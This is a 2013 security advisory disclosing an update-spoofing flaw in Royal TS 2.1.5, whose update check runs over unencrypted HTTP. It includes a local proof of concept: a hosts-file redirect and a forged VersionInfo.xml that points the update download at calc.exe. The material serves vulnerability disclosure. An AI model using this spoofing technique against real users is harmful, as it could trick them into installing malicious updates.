Royal TS 2.1.5 Update Spoofing

`  
[waraxe-2013-SA#101] - Update Spoofing Vulnerability in Royal TS 2.1.5  
===============================================================================  
  
Author: Janek Vind "waraxe"  
Date: 29. March 2013  
Location: Estonia, Tartu  
Web: http://www.waraxe.us/advisory-101.html  
  
  
Description of vulnerable software:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Royal TS is a simple, yet powerful tool for administrators, developers,  
system engineers and many other IT focused information workers that supports  
them in working effortless with their remote systems or management consoles.  
  
http://www.royalts.com/main/home/win.aspx  
  
Vulnerable is version 2.1.5, other versions not tested.  
  
  
###############################################################################  
1. Update Spoofing Vulnerability  
###############################################################################  
  
Current version of Royal TS contains security vulnerability in update mechanism,  
which can be exploited by malicious people to conduct spoofing attacks.  
  
When checking for updates, Royal TS issues GET request over HTTP:  
  
GET /dl/RoyalTS/VersionInfo.xml?r=9:54:35%20PM HTTP/1.1  
Cache-Control: no-cache  
Host: www.royalts.com  
Connection: Keep-Alive  
  
  
Server response:  
  
HTTP/1.1 200 OK  
Content-Type: text/xml  
Last-Modified: Fri, 16 Nov 2012 11:13:01 GMT  
Accept-Ranges: bytes  
ETag: "d11e6057ebc3cd1:0"  
Server: Microsoft-IIS/7.0  
X-Powered-By: ASP.NET  
Date: Thu, 28 Mar 2013 19:54:39 GMT  
Content-Length: 13375  
  
<?xml version="1.0" encoding="utf-8"?>  
<RoyalVersionInfo xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">  
<Major>2</Major>  
<Minor>1</Minor>  
<Build>5</Build>  
<MinorRevision>61116</MinorRevision>  
<DownloadURL>http://www.royalts.com/dl/RoyalTS/RoyalTSInstaller_2.01.05.61116.msi</DownloadURL>  
<ReleaseNotes>  
<html lang="en" xmlns="http://www.w3.org/1999/xhtml">< ...  
</ReleaseNotes>  
</RoyalVersionInfo>  
  
  
  
Royal TS user can click "Start Download" button and Royal TS  
will open web browser with download starting dialog.  
  
Such update mechanism contains security flaw:  
  
Update check is done over unencrypted HTTP channel. Malicious third party  
is able to conduct Man-in-the-Middle (MitM) attacks and spoof server response.  
In this way it is possible to instruct user to download malicious update.  
  
  
Testing: tests were done using Windows 7 and Apache webserver. Steps:  
  
1. modify "windows/system32/drivers/etc/hosts" file in order to emulate  
DNS spoofing: 127.0.0.1 www.royalts.com  
  
2. create xml file "/dl/RoyalTS/VersionInfo.xml" to the webserver directory  
with following content:  
  
<?xml version="1.0" encoding="utf-8"?>  
<RoyalVersionInfo xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">  
<Major>2</Major>  
<Minor>3</Minor>  
<Build>4</Build>  
<MinorRevision>61116</MinorRevision>  
<DownloadURL>http://localhost/calc.exe</DownloadURL>  
<ReleaseNotes>  
New version 2.3.4 available!  
</ReleaseNotes>  
</RoyalVersionInfo>  
  
  
3. Place "calc.exe" file to the webserver main directory.  
  
4. Open Royal TS, it will check for updates automatically, resulting in dialog:  
  
New version 2.3.4 available!  
  
  
5. Press "Start Download" button. Default web browser window will be open  
offering file download:  
  
"You have chosen to open calc.exe"  
  
  
  
Contact:  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
[email protected]  
Janek Vind "waraxe"  
  
Waraxe forum: http://www.waraxe.us/forums.html  
Personal homepage: http://www.janekvind.com/  
Random project: http://albumnow.com/  
---------------------------------- [ EOF ] ------------------------------------  
`